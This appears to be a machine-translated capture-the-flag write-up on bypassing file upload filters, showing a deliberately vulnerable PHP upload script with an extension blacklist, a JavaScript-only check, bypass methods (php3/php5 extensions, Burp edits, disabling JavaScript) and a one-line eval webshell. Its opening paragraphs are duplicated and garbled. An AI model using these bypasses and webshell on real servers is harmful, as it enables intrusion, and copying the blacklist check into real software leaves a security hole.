Webshell file upload vulnerability analysis and traceability (question 1)
Let's first look at the basic page: 
Upload 1.php ----> first 
, well as expected
upload 1.png ----> 
We look at the page element -----> 
, and there is no front-end validation
It seems that we can only use burp to capture the package to change the package to bypass, we modify 1.php ----> 1.php .png , and then upload the captured package to change the package 0x20 -----> 0x00
Webshell file upload vulnerability analysis and traceability (question 1)
Let's first look at the basic page:
Upload 1.php ----> first , well as expected
upload 1.png ---->
We look at the page element -----> , and there is no front-end validation
It seems that we can only use burp to capture the package to change the package to bypass, we modify 1.php ----> 1.php .png , and then upload the captured package to change the package 0x20 -----> 0x00
Looking at other people's wp, I found that it is a blacklist bypass, that is, uploading the simplest 1.php3 or 1.php4 or 1.php5, the server filters php... Negligence
Kitchen knife link: 
, well, slap in the face....
Come here, let's take a look at the source code:
index.php
<!doctype html> <html lang="zh-cn"> <head> <meta charset="utf-8"> <title>Upload</title> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="author" content=""> <link href="static/bootstrap.css" rel="stylesheet"> <link href="static/cover.css" rel="stylesheet"> <script src="static/jquery.js"></script> <script src="static/bootstrap.js"></script> </head> <body> <div class="site-wrapper"> <form class="form-signin" action="upload.php" method="post" enctype="multipart/form-data" name="upload"> <h3>Please select a file to upload:</h3> <input class="form-control" type="file" name="upfile"/> <input type="submit" name="submit" value="上传文件"/> </form> </div> </body> </html>
upload.php
<? php // Server-side extension verification for file upload vulnerability demo script header ("Content-type: text/html; charset=utf-8" ); error_reporting (0 ); header ("Content-type: text/html ; charset=utf-8" ); error_reporting (0 ); $uploaddir = 'uploads/' ; if ( isset ( $_POST ['submit' ])) { if ( file_exists ( $uploaddir )) { $deny_ext = array ( '.asp', '.php', '.aspx', '.jsp' ); //echo strrchr($_FILES['upfile']['name'], '.'); $file_ext = strrchr($_FILES['upfile']['name'], '.'); //echo $file_ext; if (!in_array($file_ext, $deny_ext)) { if (move_uploaded_file($_FILES['upfile']['tmp_name'], $uploaddir . '/' . $_FILES['upfile']['name'])) { echo '文件上传成功保存于:' . $uploaddir . $_FILES['upfile']['name'] . "\n"; } } else { echo 'This file is not allowed to upload' . "\n" ; } } else { exit ( $uploaddir . 'The folder does not exist, please create it manually' ); } //print_r($_FILES); } ?>
It uses a blacklist to filter php and is filtered out, but there are other versions of php, php3, php4, php5 can all be resolved by the parser
Webshell file upload vulnerability analysis and traceability (question 2)
This time we upload 1.php3 :
Upload 1.png :
We put 1.php ---> 1.php .jpg ,
Let's look at the page source code:
<!doctype html> <html lang="zh-cn"> <head> <meta charset="utf-8"> <title>Upload</title> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="author" content=""> <link href="static/bootstrap.css" rel="stylesheet"> <link href="static/cover.css" rel="stylesheet"> <script src="static/jquery.js"></script> <script src="static/bootstrap.js"></script> <script language="JavaScript"> extArray = new Array(".gif", ".jpg", ".png"); function LimitAttach(form, file) { allowSubmit = false; if (!file) return; while (file.indexOf("\\") != -1) file = file.slice(file.indexOf("\\") + 1); ext = file.slice(file.indexOf(".")).toLowerCase(); for (var i = 0; i < extArray.length; i++) { if (extArray[i] == ext) { allowSubmit = true; break; } } if (allowSubmit) form. submit(); else alert( "Sorry, you can only upload files in the following formats: " + (extArray. join (" ")) + "\nPlease re-select the eligible files" + "Upload again." ); return false ; } </script> </head> <body> <div class="site-wrapper"> <form class="form-signin" action="upload.php" method="post" enctype="multipart/form-data" name="upload"> <h3>Please select a file to upload:</h3> <input class="form-control" type="file" name="uploadfile"/> <input type="submit" name="submit" value="上传文件" onclick="return LimitAttach(this.form, this.form.uploadfile.value)"/> </form> </div> </body> </html>
It is found that there is js verification on the front end, and only files in image format can be recognized for uploading. There are two methods:
The first is: change the suffix name of the one-sentence Trojan 1.php to .jpg format and upload it, use burpsuit to change the file format to 1.php, and use the kitchen knife to link to get the shell after successful upload, and find the key .
The second is: first enter about:config in the browser (only for Firefox), then search for javascript .enabled will switch to false, which will disable javascript, front-end verification will not work, create a Trojan horse <? Php eval($_post['123'])?>, upload directly, return the upload path uploads/1.php, and then link the kitchen knife
Webshell File Upload Vulnerability Analysis and Traceability (Question 3)
Webshell file upload vulnerability analysis and traceability (question 4)
